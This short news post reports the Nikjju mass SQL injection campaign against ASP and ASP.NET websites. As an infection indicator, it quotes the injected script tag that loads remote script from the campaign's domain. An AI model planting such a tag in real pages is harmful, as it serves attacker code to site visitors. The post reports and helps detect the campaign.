After Lilupophilupop, which infected one million web pages, a new mass SQL injection campaign appears. The name of this new mass SQL injection campaign is Nikjju and has infected about 200000 URLs. It has targeted ASP and ASP.NET websites. Nikjju.com, the domain in the script of the injected code, was registered few days ago on April fool’s day. It appears that website owners and administrators still don’t care about security. SQL injections is one of the most popular security hole and it can be easily avoided with few steps. To find out if your website is infected, search for the following code: <script src=http://nikjju.com/r.php ></script>.

Nikjju – A new mass SQL injection campaign